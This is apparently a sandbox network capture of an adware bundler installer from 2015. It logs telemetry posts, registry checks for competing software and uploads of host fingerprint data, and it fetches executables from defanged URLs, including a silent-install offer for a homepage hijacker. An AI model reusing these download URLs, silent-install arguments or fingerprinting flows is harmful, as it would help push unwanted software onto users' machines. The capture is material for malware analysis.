{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:37 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:39 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:39 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:40 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:40 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:41 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:41 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:42 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:42 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:42 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:42 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:50 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:50 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:59:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:59:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:59:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:59:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
<<< skipped >>>
GET /binsis/get_pre_offering_checks?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sun, 06 Sep 2015 22:59:13 GMT
Expires: Sun, 06 Sep 2015 20:12:33 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 1fcd1033bfe42d3b0b03eb4bfbf9624a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kAb47qG1qlzOZrd7ZUULdXky7NgLIl-5xySEeejeq7h_pnyCDJKM0A==
37a0..<?xml version="1.0"?>.<pre_offering_checks><check type="registry" return_name="check_4" return_value_type="boolean"><value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check></check><check type="registry" return_name="check_586" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer</key><name>AppsHat</name></value_to_check></check><check type="registry" return_name="check_1842" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer\AppsHat</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2182" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2246" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2450" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check></check><check type="registry" return_name="check_3850" return_value_type="boolean"><val
<<< skipped >>>
POST /binsis/xml?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: nsn47.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 8480
Connection: Keep-Alive
Cache-Control: no-cache
installer_data={"uid":"78E613EC0FD24B388D7E6C851DDC4F6F","muid":"9e10bdd7664ab688d1d7f2ab0b148110","affid":"vuupcntmb","sid":"vuupculwo","installerVersion":"2.2.2","osVersion":"5.1.2600 32bit","ieVersion":"6.0.2900.5512","ff_installed":"0","ff_version":"","ff_default_homepage":"not_found","ff_is_default":"0","ie_installed":"1","ie_version":"6.0.2900.5512","ie_default_homepage":"about:blank","ie_is_default":"0","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sun, 06 Sep 2015 22:59:20 GMT
Vary: Accept-Encoding
Expires: Sun, 06 Sep 2015 20:12:40 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 1fcd1033bfe42d3b0b03eb4bfbf9624a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: euTJcqjbD-fHaGi0YiQfAt6_KwmT_b3PqaApIqHCK3MbopKnXIbtHA==
1778..<?xml version="1.0" encoding="windows-1252"?>.<sponsored_data><downloader><url>hXXp://sub.spirlymo.com/installers/bi_downloader/1441577004706/setup.exe</url><downloadOnInit>1</downloadOnInit><args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="%AffiliateID%" -muid="%MUID%"</args></downloader><offers><offer id="istartsurf"><remote_resources/><downloader><args>_!delimiter!_ -offerId="%OfferID%" -softwareName="Istartsurf"</args></downloader><title>Special Offer</title><sub_title>To go along with your Vuupc</sub_title><download_url>hXXp://d2drfrdurj6mvo.cloudfront.net/liyan/smt_istartsurf.exe</download_url><execution_arguments>-silence -ptid=smt</execution_arguments><options><option type="v_space" height="5"/><option type="text" width="100"><id>descriptionElement</id><text><decor type="text">Make Istartsurf my browser homepage, default search and new tab</decor></text></option><option type="v_space" height="5"/><option type="text" width="100"><id>footerElement</id><text><decor type="text">By clicking Next you are agreeing to Istartsurf</decor><decor type="link" href="hXXp://VVV.istartsurf.com/license_agreement.html">Terms of Use</decor><decor type="text">and</decor><de
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40537
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds046.am4.c
PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c
<<< skipped >>>
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:59 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1441580339; expires=Fri, 31 Dec 15 16:45:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1441580339793277; path=/; expires=Tue, 06-Oct-15 22:58:59 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40532
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds046.am4.c
[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
